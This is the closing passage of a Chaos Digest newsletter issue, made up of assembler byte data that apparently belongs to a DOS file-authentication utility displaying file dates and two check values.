db 0, 0B8h, 0, 57h, 8Bh, 1Eh
db 4Eh, 6, 0CDh, 21h, 73h, 8
db 0BEh, 0DDh, 3, 0E8h, 8Fh, 0FDh
db 0EBh, 26h, 52h, 8Bh, 0C2h, 0B1h
db 5, 0D3h, 0E8h, 25h, 0Fh, 0
db 0E8h, 70h, 1, 0E8h, 98h, 0
db 58h, 50h, 25h, 1Fh, 0, 0E8h
db 65h, 1, 0E8h, 8Dh, 0, 58h
db 0B1h, 9, 0D3h, 0E8h, 5, 0BCh
db 7, 0E8h, 57h, 1, 0E8h, 7Ch
db 0FDh
db 0Dh, 0Ah, 'File Authentication:', 0Dh
db 0Ah, ' Check Method 1 - '
db 0, 8Bh, 0Eh, 52h, 6, 0E8h
db 27h, 0, 0E8h, 43h, 0FDh
db 0Dh, 0Ah, ' Check Method 2 - '
db 0, 8Bh, 0Eh, 54h, 6, 0E8h
db 4, 0, 0E8h, 27h, 0, 0C3h
db 51h, 89h, 0C8h, 88h, 0E0h, 0E8h
db 1, 0
db 58h

------------------------------

End of Chaos Digest #1.37
************************************
